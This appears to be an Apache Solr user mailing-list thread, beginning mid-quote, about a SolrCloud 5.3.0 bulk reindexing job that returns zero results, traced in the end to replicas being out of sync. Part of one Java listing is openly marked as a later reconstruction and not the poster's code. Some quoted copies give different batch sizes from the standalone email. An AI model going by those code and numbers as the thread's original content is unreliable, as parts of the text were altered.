> > On Sat, Sep 26, 2015 at 11:00 PM, Erick Erickson <
> erickerick...@gmail.com>
> > wrote:
> >
> > > bq: 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially
> > > using
> > > 100 docs batch, which, I later increased to 500 docs per batch. Also it
> > > would not be a infinite loop if I commit for each batch, right !!??
> > >
> > > That's not the point at all. Look at the basic logic here:
> > >
> > > You run for a while processing 100 (or 500 or 1,000) docs per batch
> > > and change all uuid fields with this statement:
> > >
> > > uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", "");
> > >
> > > and then update the doc. You run this as long as you have any docs
> > > that satisfy the query "q=uuid:sun.org.mozilla*", _changing_
> > > every one that has this string!
> > >
> > > At that point, theoretically, no document in your index has this
> string.
> > So
> > > running your update program immediately after should find _zero_
> > documents.
> > >
> > > I've been assuming your complaint is that you don't process 1.4 M docs
> > (in
> > > batches), you process some lower number then exit and you think this is
> > > wrong.
> > > I'm claiming that you should only expect to find as many docs as have
> > been
> > > indexed since the last time the program ran.
> > >
> > > As far as the infinite loop is concerned, again trace the logic in the
> > old
> > > code.
> > > Forget about commits and all the mechanics, just look at the logic.
> > > You're querying on "sun.org.mozilla*". But you only change if you get a
> > > match on
> > > "sun.org.mozilla.javascript.internal.NativeString:"
> > >
> > > Now imagine you have a doc that has sun.org.mozilla.erick in it. That
> doc
> > > gets
> > > returned fr

Re: bulk reindexing 5.3.0 issue

2015-09-26 Thread Ravi Solr
Erick, I fixed the "missing content stream" issue as well, by making sure
I am not adding an empty list. However, my very first issue of getting zero
docs once in a while is still haunting me, even after using cursorMarks and
disabling auto commit and soft commit. I ran the code two times and you can
see the statement returns zero docs at random times.

log.info("Indexed " + count + "/" + docList.getNumFound());

-bash-4.1$ tail -f reindexing.log
2015-09-26 01:44:40 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 6500/1440653
2015-09-26 01:44:44 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 7000/1439863
2015-09-26 01:44:48 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 7500/1439410
2015-09-26 01:44:56 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 8000/1438918
2015-09-26 01:45:01 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 8500/1438330
2015-09-26 01:45:01 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 8500/0
2015-09-26 01:45:06 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!

2015-09-26 01:48:15 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 500/1437440
2015-09-26 01:48:19 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1000/1437440
2015-09-26 01:48:19 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1000/0
2015-09-26 01:48:22 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!


Thanks

Ravi Kiran Bhaskar

On Sat, Sep 26, 2015 at 1:17 AM, Ravi Solr <ravis...@gmail.com> wrote:

> Erick as per your advise I used cursorMarks (see code below). It was
> slightly better but Solr throws Exceptions randomly. Please look at the
> code and Stacktrace below
>
> 2015-09-26 01:00:45 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 500/1453133
> 2015-09-26 01:00:49 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1000/1453133
> 2015-09-26 01:00:54 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1500/1452592
> 2015-09-26 01:00:58 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2000/1452095
> 2015-09-26 01:01:03 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2500/1451675
> 2015-09-26 01:01:10 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3000/1450924
> 2015-09-26 01:01:15 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3500/1450445
> 2015-09-26 01:01:19 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4000/1449997
> 2015-09-26 01:01:24 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4500/1449692
> 2015-09-26 01:01:28 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 5000/1449201
> 2015-09-26 01:01:28 ERROR [a.b.c.AdhocCorrectUUID] - Error indexing
> org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:
> Error from server at http://xx.xx.xx.xx:/solr/collection1: missing
> content stream
> at
> org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:560)
> at
> org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:234)
> at
> org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:226)
> at
> org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:376)
> at
> org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:328)
> at
> org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1085)
> at
> org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:856)
> at
> org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:799)
> at
> org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:135)
> at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:107)
> at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:72)
> at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:86)
> at a.b.c.AdhocCorrectUUID.processDocs(AdhocCorrectUUID.java:97)
> at a.b.c.AdhocCorrectUUID.main(AdhocCorrectUUID.java:37)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at
> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
> at
> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
> at java.lang.reflect.Method.invoke(Method.java:606)
> at com.simontuffs.onejar.Boot.run(Boot.java:306)
> at com.simontuffs.onejar.Boot.main(Boot.java:159)
> 2015-09-26 01:01:28 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!
>
>
> CODE
> 
> protected static void processDocs() {
>
> try {
> CloudSolrClient client = new
> CloudSolrClient("zk1:,zk2:,zk3.com:");
> client.setDefaultCollection("collection1");
>
> boolean done = false;
> String cursorMark = CursorMarkParams.CURSOR_MARK_START;
> Integer count = 0;
>
> while (!done) {
> SolrQuery q = new
> SolrQuery("*:*").setRows(500).addSort(&

Re: bulk reindexing 5.3.0 issue

2015-09-26 Thread Ravi Solr
Erick & Shawn, I incorporated your suggestions.


0. Shut off all other indexing processes.
1. As Shawn mentioned, set the batch size to 10000.
2. Loved Erick's suggestion about not using a filter at all: sort by
uniqueId and use the last seen uniqueId as the next query's range start,
while still using cursor marks, as follows:

SolrQuery q = new SolrQuery("+uuid:sun.org.mozilla* +uniqueId:{" +
    markerSysId + " TO *]").setRows(10000)
    .addSort("uniqueId", ORDER.asc)
    .setFields(new String[]{"uniqueId", "uuid"});
q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark);

3. As per Shawn's advice, commented out autocommit and soft commit in
solrconfig.xml, set openSearcher to false, and issued a MANUAL COMMIT for
every batch from code as follows:

client.commit(true, true, true); // waitFlush, waitSearcher, softCommit

Here is what the log statement & results - log.info("Indexed " + count +
"/" + docList.getNumFound());


2015-09-26 17:29:57 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 90000/1344085
2015-09-26 17:30:30 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 100000/1334085
2015-09-26 17:33:26 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 110000/1324085
2015-09-26 17:36:09 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 120000/1314085
2015-09-26 17:39:42 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 130000/1304085
2015-09-26 17:43:05 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 140000/1294085
2015-09-26 17:46:14 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 150000/1284085
2015-09-26 17:48:22 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 160000/1274085
2015-09-26 17:48:25 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 160000/0
2015-09-26 17:48:25 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!

Ran manually a second time to see if first was fluke. Still same.

2015-09-26 17:55:26 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 10000/1264716
2015-09-26 17:58:07 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 20000/1254716
2015-09-26 18:03:09 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 30000/1244716
2015-09-26 18:06:32 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 40000/1234716
2015-09-26 18:10:35 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 50000/1224716
2015-09-26 18:15:23 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 60000/1214716
2015-09-26 18:15:24 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 60000/0
2015-09-26 18:15:26 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!

Now changed the autocommit in solrconfig.xml as follows... Note the soft
commit has been shut off as per Shawn's advice:


   
   <autoCommit>
     <maxTime>300000</maxTime>
     <openSearcher>false</openSearcher>
   </autoCommit>


  

2015-09-26 18:47:44 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 10000/1205451
2015-09-26 18:50:49 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 20000/1195451
2015-09-26 18:54:18 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 30000/1185451
2015-09-26 18:57:04 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 40000/1175451
2015-09-26 19:00:10 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 50000/1165451
2015-09-26 19:00:13 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 50000/0
2015-09-26 19:00:13 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
FINISHED !!!


The query still returned 0 results when they are over million docs
available which match uuid:sun.org.mozilla* ...Then why do I get 0 ???

Thanks

Ravi Kiran Bhaskar

On Sat, Sep 26, 2015 at 3:49 PM, Ravi Solr <ravis...@gmail.com> wrote:

> Thank you Erick & Shawn for taking significant time off your weekends to
> debug and explain in great detail. I will try to address the main points
> from your emails to provide more situation context for better understanding
> of my situation
>
> 1. Erick, As part of our upgrade from 4.7.2 to 5.3.0 I re-indexed all docs
> from my old Master-Slave to My SolrCloud using DIH SolrEntityProcessor
> which used a Script Transformer. I unwittingly messed up the script and
> hence this 'uuid' (String Type field) got messed up. All records prior to
> Sep 20 2015 have this issue that I am currently trying to rectify.
>
> 2. Regarding openSearcher=true/false, I had it as false all along in my
> 4.7.2 config. I read somewhere that SolrCloud or 5.x doesn't honor it or it
> should be left default (Don't exactly remember where I read it), hence, I
> removed it from my solrconfig.xml going against my intuition :-)
>
> 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially using
> 100 docs batch, which, I later increased to 500 docs per batch. Also it
> would not be a infinite loop if I commit for each batch, right !!??
>
> 4. Shawn, you are correct the uuid is of String Type and its not unique
> key for my schema. My uniqueKey is uniqueId and systemid is of no
> consequence here, it's another field for differentiating apps within my
> solr.
>
> Than you very much again guys. I will incorporate your suggestions and
> report back.
>
> Thanks
>
> Ravi Kiran Bhaskar
>

Re: bulk reindexing 5.3.0 issue

2015-09-26 Thread Ravi Solr
Thank you Erick & Shawn for taking significant time off your weekends to
debug and explain in great detail. I will try to address the main points
from your emails to provide more situation context for better understanding
of my situation

1. Erick, As part of our upgrade from 4.7.2 to 5.3.0 I re-indexed all docs
from my old Master-Slave to My SolrCloud using DIH SolrEntityProcessor
which used a Script Transformer. I unwittingly messed up the script and
hence this 'uuid' (String Type field) got messed up. All records prior to
Sep 20 2015 have this issue that I am currently trying to rectify.

2. Regarding openSearcher=true/false, I had it as false all along in my
4.7.2 config. I read somewhere that SolrCloud or 5.x doesn't honor it or it
should be left default (Don't exactly remember where I read it), hence, I
removed it from my solrconfig.xml going against my intuition :-)

3. Erick, I wasn't getting all 1.4 million in one shot. I was initially using
a 100-doc batch, which I later increased to 500 docs per batch. Also, it
would not be an infinite loop if I commit for each batch, right!!??

4. Shawn, you are correct: the uuid is of String type and it's not the unique
key for my schema. My uniqueKey is uniqueId, and systemid is of no consequence
here, it's another field for differentiating apps within my solr.

Thank you very much again, guys. I will incorporate your suggestions and
report back.

Thanks

Ravi Kiran Bhaskar

On Sat, Sep 26, 2015 at 12:58 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Oh, one more thing. _assuming_ you can't change the indexing process
> that gets the docs from the system of record, why not just add an
> update processor that does this at index time? See:
> https://cwiki.apache.org/confluence/display/solr/Update+Request+Processors
> ,
> in particular the StatelessScriptUpdateProcessorFactory might be a
> good candidate. It just takes a bit of javascript (or other scripting
> language) and changes the record before it gets indexed.
>
> FWIW,
> Erick
>
> On Sat, Sep 26, 2015 at 9:52 AM, Shawn Heisey <apa...@elyograg.org> wrote:
> > On 9/26/2015 10:41 AM, Shawn Heisey wrote:
> >>  <autoCommit> <maxTime>300000</maxTime> </autoCommit>
> >
> > This needs to include openSearcher=false, as Erick mentioned.  I'm sorry
> > I screwed that up:
> >
> >   <autoCommit>
> >     <maxTime>300000</maxTime>
> >     <openSearcher>false</openSearcher>
> >   </autoCommit>
> >
> > Thanks,
> > Shawn
>


Re: bulk reindexing 5.3.0 issue

2015-09-26 Thread Ravi Solr
Erick...There is only one type of String
"sun.org.mozilla.javascript.internal.NativeString:" and no other variations
of that in my index, so no question of missing it. Point taken regarding
the CURSORMARK stuff, yes you are correct, my head is so numb at this point
after working 3 days on this, I wasn't thinking straight.

BTW I found the real issue, I have a total of 8 servers in the solr cloud.
The leader for this specific collection was the one that was returning 0
for the searches. All other 7 servers had roughly 800K docs still needing
the string replacement. So maybe the real issue is sync among servers. Just
to prove it to myself, I shut down the Solr node that was giving zero results
(i.e. all uuid strings on that server had already somehow been stripped of the
spurious sun.org.mozilla.javascript.internal.NativeString prefix). Now it
ran perfectly fine and is about to finish, as the last 103K are still left when
I was writing this email.

So the real question is how can we ensure that the Sync is always
maintained and what to do if it ever goes out of Sync, I did see some Jira
tickets from previous 4.10.x versions where Sync was an issue. Can you
please point me to any doc which says how SolrCloud synchs/replicates ?

Thanks,

Ravi Kiran Bhaskar

Thanks

Rvai Kiran Bhaskar

On Sat, Sep 26, 2015 at 11:00 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> bq: 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially
> using
> 100 docs batch, which, I later increased to 500 docs per batch. Also it
> would not be a infinite loop if I commit for each batch, right !!??
>
> That's not the point at all. Look at the basic logic here:
>
> You run for a while processing 100 (or 500 or 1,000) docs per batch
> and change all uuid fields with this statement:
>
> uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", "");
>
> and then update the doc. You run this as long as you have any docs
> that satisfy the query "q=uuid:sun.org.mozilla*", _changing_
> every one that has this string!
>
> At that point, theoretically, no document in your index has this string. So
> running your update program immediately after should find _zero_ documents.
>
> I've been assuming your complaint is that you don't process 1.4 M docs (in
> batches), you process some lower number then exit and you think this is
> wrong.
> I'm claiming that you should only expect to find as many docs as have been
> indexed since the last time the program ran.
>
> As far as the infinite loop is concerned, again trace the logic in the old
> code.
> Forget about commits and all the mechanics, just look at the logic.
> You're querying on "sun.org.mozilla*". But you only change if you get a
> match on
> "sun.org.mozilla.javascript.internal.NativeString:"
>
> Now imagine you have a doc that has sun.org.mozilla.erick in it. That doc
> gets
> returned from the query but does _not_ get modified because it doesn't
> match your pattern. In the older code, it would be found again and
> returned next
> time you queried. Then not modified again. Eventually you'd be in a
> position
> where you never changed any docs, just kept getting the same docList back
> over and over again. Marching through based on the unique key should not
> have the same potential issue.
>
> You should not be mixing the new query stuff with CURSORMARK. Deep paging
> supposes the exact same query is being run over and over and you're
> _paging_
> through the results. You're changing the query every time so the results
> aren't
> very predictable.
>
> Best,
> Erick
>
>
> On Sat, Sep 26, 2015 at 5:01 PM, Ravi Solr <ravis...@gmail.com> wrote:
> > Erick & Shawn I incrporated your suggestions.
> >
> >
> > 0. Shut off all other indexing processes.
> > 1. As Shawn mentioned set batch size to 1.
> > 2. Loved Erick's suggestion about not using filter at all and sort by
> > uniqueId and put last known uinqueId as next queries start while still
> > using cursor marks as follows
> >
> > SolrQuery q = new SolrQuery("+uuid:sun.org.mozilla* +uniqueId:{" +
> > markerSysId + " TO
> > *]").setRows(1).addSort("uniqueId",ORDER.asc).setFields(new
> > String[]{"uniqueId","uuid"});
> > q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark);
> >
> > 3. As per Shawn's advise commented autocommit and soft commit in
> > solrconfig.xml and set openSearcher to false and issued MANUAL COMMIT for
> > every batch from code as follows
> >
> > client.commit(true, true, true);
> >
> > Here is what the log statement & results - log.info("Indexed " + count +
> > "/" + docList.get

Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
Erick as per your advise I used cursorMarks (see code below). It was
slightly better but Solr throws Exceptions randomly. Please look at the
code and Stacktrace below

2015-09-26 01:00:45 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 500/1453133
2015-09-26 01:00:49 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1000/1453133
2015-09-26 01:00:54 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1500/1452592
2015-09-26 01:00:58 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2000/1452095
2015-09-26 01:01:03 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2500/1451675
2015-09-26 01:01:10 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3000/1450924
2015-09-26 01:01:15 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3500/1450445
2015-09-26 01:01:19 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4000/1449997
2015-09-26 01:01:24 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4500/1449692
2015-09-26 01:01:28 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 5000/1449201
2015-09-26 01:01:28 ERROR [a.b.c.AdhocCorrectUUID] - Error indexing
org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error
from server at http://xx.xx.xx.xx:/solr/collection1: missing content
stream
at
org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:560)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:234)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:226)
at
org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:376)
at
org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:328)
at
org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1085)
at
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:856)
at
org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:799)
at
org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:135)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:107)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:72)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:86)
at a.b.c.AdhocCorrectUUID.processDocs(AdhocCorrectUUID.java:97)
at a.b.c.AdhocCorrectUUID.main(AdhocCorrectUUID.java:37)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:606)
at com.simontuffs.onejar.Boot.run(Boot.java:306)
at com.simontuffs.onejar.Boot.main(Boot.java:159)
2015-09-26 01:01:28 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!


CODE

protected static void processDocs() {

try {
CloudSolrClient client = new
CloudSolrClient("zk1:,zk2:,zk3.com:");
client.setDefaultCollection("collection1");

boolean done = false;
String cursorMark = CursorMarkParams.CURSOR_MARK_START;
Integer count = 0;

while (!done) {
SolrQuery q = new
SolrQuery("*:*").setRows(500).addSort("publishtime",
ORDER.desc).addSort("uniqueId",ORDER.desc).setFields(new
String[]{"uniqueId","uuid"});
q.addFilterQuery(new String[] {"uuid:[* TO *]",
"uuid:sun.org.mozilla*"});
q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark);

QueryResponse resp = client.query(q);
String nextCursorMark = resp.getNextCursorMark();

SolrDocumentList docList = resp.getResults();

List<SolrInputDocument> inList = new
ArrayList<SolrInputDocument>();
for(SolrDocument doc : docList) {

SolrInputDocument iDoc =
ClientUtils.toSolrInputDocument(doc);

//This is my system's id
String uniqueId = (String)
iDoc.getFieldValue("uniqueId");

/*
 * This is another system's unique id which is what I
want to correct that was messed
 * because of script transformer in DIH import via
SolrEntityProcessor
 * ex-
sun.org.mozilla.javascript.internal.NativeString:9cdef726-05dd-40b7-b1b2-c9bbce96741f
 */
String uuid = (String) iDoc.getFieldValue("uuid");
String sanitizedUUID =
uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", "");
Map<String,String> fieldModifier = new
HashMap<String,String>(1);
fieldModifier.put("set",sanitizedUUID);
iDoc.setField("uuid", fieldModifier);

inList.add(iDoc);
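
}

// (The archived message is cut off here; the rest of the method below is a
// hedged reconstruction based on the author's earlier version of processDocs()
// and the log output above -- not the author's verbatim code.)
client.add(inList);

count = count + docList.size();
log.info("Indexed " + count + "/" + docList.getNumFound());

// Advance the cursor; when it stops moving, the last page has been consumed.
if (cursorMark.equals(nextCursorMark)) {
done = true;
}
cursorMark = nextCursorMark;
}

log.info("FINISHED !!!");

} catch (Exception e) {
log.error("Error indexing ", e);
}
}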

bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
I have been trying to re-index the docs (about 1.5 million) as one of the
fields needed part of its string value removed (accidentally introduced). I was
issuing a query for 100 docs, getting 4 fields, and updating the docs (atomic
update with "set") via the CloudSolrClient in batches. However, from time to
time the query returns 0 results, which exits the re-indexing program.

I can't understand why the cloud returns 0 results when there are 1.4x
million docs which have the "accidental" string in them.

Is there another way to do massive bulk updates?

Thanks

Ravi Kiran Bhaskar


Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
No problem Walter, it's all fun. Was just wondering if there was some other
good way that I did not know of, that's all.

Thanks

Ravi Kiran Bhaskar

On Friday, September 25, 2015, Walter Underwood <wun...@wunderwood.org>
wrote:

> Sorry, I did not mean to be rude. The original question did not say that
> you don’t have the docs outside of Solr. Some people jump to the advanced
> features and miss the simple ones.
>
> It might be faster to fetch all the docs from Solr and save them in files.
> Then modify them. Then reload all of them. No guarantee, but it is worth a
> try.
>
> Good luck.
>
> wunder
> Walter Underwood
> wun...@wunderwood.org <javascript:;>
> http://observer.wunderwood.org/  (my blog)
>
>
> > On Sep 25, 2015, at 2:59 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>> wrote:
> >
> > Walter, Not in a mood for banter right now Its 6:00pm on a friday and
> > Iam stuck here trying to figure reindexing issues :-)
> > I dont have source of docs so I have to query the SOLR, modify and put it
> > back and that is seeming to be quite a task in 5.3.0, I did reindex
> several
> > times with 4.7.2 in a master slave env without any issue. Since then we
> > have moved to cloud and it has been a pain all day.
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
> > On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <wun...@wunderwood.org
> <javascript:;>>
> > wrote:
> >
> >> Sure.
> >>
> >> 1. Delete all the docs (no commit).
> >> 2. Add all the docs (no commit).
> >> 3. Commit.
> >>
> >> wunder
> >> Walter Underwood
> >> wun...@wunderwood.org <javascript:;>
> >> http://observer.wunderwood.org/  (my blog)
> >>
> >>
> >>> On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>> wrote:
> >>>
> >>> I have been trying to re-index the docs (about 1.5 million) as one of
> the
> >>> field needed part of string value removed (accidentally introduced). I
> >> was
> >>> issuing a query for 100 docs getting 4 fields and updating the doc
> >> (atomic
> >>> update with "set") via the CloudSolrClient in batches, However from
> time
> >> to
> >>> time the query returns 0 results, which exits the re-indexing program.
> >>>
> >>> I cant understand as to why the cloud returns 0 results when there are
> >> 1.4x
> >>> million docs which have the "accidental" string in them.
> >>>
> >>> Is there another way to do bulk massive updates ?
> >>>
> >>> Thanks
> >>>
> >>> Ravi Kiran Bhaskar
> >>
> >>
>
>


Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
Walter, not in a mood for banter right now. It's 6:00 PM on a Friday and
I am stuck here trying to figure out reindexing issues :-)
I don't have the source of the docs, so I have to query Solr, modify, and put it
back, and that is proving to be quite a task in 5.3.0. I did reindex several
times with 4.7.2 in a master-slave env without any issue. Since then we
have moved to cloud and it has been a pain all day.

Thanks

Ravi Kiran Bhaskar

On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <wun...@wunderwood.org>
wrote:

> Sure.
>
> 1. Delete all the docs (no commit).
> 2. Add all the docs (no commit).
> 3. Commit.
>
> wunder
> Walter Underwood
> wun...@wunderwood.org
> http://observer.wunderwood.org/  (my blog)
>
>
> > On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com> wrote:
> >
> > I have been trying to re-index the docs (about 1.5 million) as one of the
> > field needed part of string value removed (accidentally introduced). I
> was
> > issuing a query for 100 docs getting 4 fields and updating the doc
> (atomic
> > update with "set") via the CloudSolrClient in batches, However from time
> to
> > time the query returns 0 results, which exits the re-indexing program.
> >
> > I cant understand as to why the cloud returns 0 results when there are
> 1.4x
> > million docs which have the "accidental" string in them.
> >
> > Is there another way to do bulk massive updates ?
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
>
>


Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
Thanks for responding, Erick. I set the "start" to zero and "rows" always to
100. I create a CloudSolrClient instance and use it both to query and to
index. But I do sleep for 5 secs just to allow for any autocommits.

So query --> client.add(100 docs) --> wait --> query again

But the weird thing I noticed was that after 8 or 9 batches, i.e. 800/900
docs, the "query again" returns zero docs, causing my while loop to
exit... so I was trying to see if I was doing the right thing or if there is
an alternate way to do heavy indexing.

Thanks

Ravi Kiran Bhaskar



On Friday, September 25, 2015, Erick Erickson <erickerick...@gmail.com>
wrote:

> How are you querying Solr? You say you query for 100 docs,
> update then get the next set. What are you using for a marker?
> If you're using the start parameter, and somehow a commit is
> creeping in things might be weird, especially if you're using any
> of the internal Lucene doc IDs. If you're absolutely sure no commits
> are taking place even that should be OK.
>
> The "deep paging" stuff could be helpful here, see:
>
> https://lucidworks.com/blog/coming-soon-to-solr-efficient-cursor-based-iteration-of-large-result-sets/
>
> Best,
> Erick
>
> On Fri, Sep 25, 2015 at 3:13 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>> wrote:
> > No problem Walter, it's all fun. Was just wondering if there was some
> other
> > good way that I did not know of, that's all 
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
> > On Friday, September 25, 2015, Walter Underwood <wun...@wunderwood.org
> <javascript:;>>
> > wrote:
> >
> >> Sorry, I did not mean to be rude. The original question did not say that
> >> you don’t have the docs outside of Solr. Some people jump to the
> advanced
> >> features and miss the simple ones.
> >>
> >> It might be faster to fetch all the docs from Solr and save them in
> files.
> >> Then modify them. Then reload all of them. No guarantee, but it is
> worth a
> >> try.
> >>
> >> Good luck.
> >>
> >> wunder
> >> Walter Underwood
> >> wun...@wunderwood.org <javascript:;> <javascript:;>
> >> http://observer.wunderwood.org/  (my blog)
> >>
> >>
> >> > On Sep 25, 2015, at 2:59 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>
> >> <javascript:;>> wrote:
> >> >
> >> > Walter, Not in a mood for banter right now Its 6:00pm on a friday
> and
> >> > Iam stuck here trying to figure reindexing issues :-)
> >> > I dont have source of docs so I have to query the SOLR, modify and
> put it
> >> > back and that is seeming to be quite a task in 5.3.0, I did reindex
> >> several
> >> > times with 4.7.2 in a master slave env without any issue. Since then
> we
> >> > have moved to cloud and it has been a pain all day.
> >> >
> >> > Thanks
> >> >
> >> > Ravi Kiran Bhaskar
> >> >
> >> > On Fri, Sep 25, 2015 at 5:25 PM, Walter Underwood <
> wun...@wunderwood.org <javascript:;>
> >> <javascript:;>>
> >> > wrote:
> >> >
> >> >> Sure.
> >> >>
> >> >> 1. Delete all the docs (no commit).
> >> >> 2. Add all the docs (no commit).
> >> >> 3. Commit.
> >> >>
> >> >> wunder
> >> >> Walter Underwood
> >> >> wun...@wunderwood.org <javascript:;> <javascript:;>
> >> >> http://observer.wunderwood.org/  (my blog)
> >> >>
> >> >>
> >> >>> On Sep 25, 2015, at 2:17 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>
> >> <javascript:;>> wrote:
> >> >>>
> >> >>> I have been trying to re-index the docs (about 1.5 million) as one
> of
> >> the
> >> >>> field needed part of string value removed (accidentally
> introduced). I
> >> >> was
> >> >>> issuing a query for 100 docs getting 4 fields and updating the doc
> >> >> (atomic
> >> >>> update with "set") via the CloudSolrClient in batches, However from
> >> time
> >> >> to
> >> >>> time the query returns 0 results, which exits the re-indexing
> program.
> >> >>>
> >> >>> I cant understand as to why the cloud returns 0 results when there
> are
> >> >> 1.4x
> >> >>> million docs which have the "accidental" string in them.
> >> >>>
> >> >>> Is there another way to do bulk massive updates ?
> >> >>>
